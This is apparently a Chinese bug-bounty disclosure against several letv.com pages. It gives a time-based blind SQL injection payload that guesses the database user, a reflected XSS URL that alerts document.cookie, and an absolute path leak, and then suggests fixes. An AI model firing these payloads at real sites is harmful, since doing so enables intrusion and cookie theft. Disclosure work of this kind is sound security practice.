注射点位于(参数ID):
http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=1&_=1408792945702
反射型XSS位于:
http://address.shop.letv.com/api/web/insert/insUserAddress.jsonp?callback=callback__%3Cimg%20src=aaaa%20οnerrοr=alert(document.cookie)%3E&
绝对路径泄漏位于:
http://joyearcars2014happy.hz.letv.com/php/joyearcar.php?callback=aaaa&username=
Notice: Undefined index: tel in /letv/joyearcars2014happy.hz.letv.com/php/joyearcar.php on line 11漏洞证明:
http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=if(length(user())>22,sleep(1),0)&_=1408792945702
可猜解当前连接用户的长度为23。
我只猜解了第一个字母的ASCII码为50,字母“2”:
http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=if(ascii(mid(user(),1,1))=50,sleep(1),2)--&_=1408792945702
非root,未进一步利用。
修复方案:
解决SQL注射
编码callback
不显示详细错误信息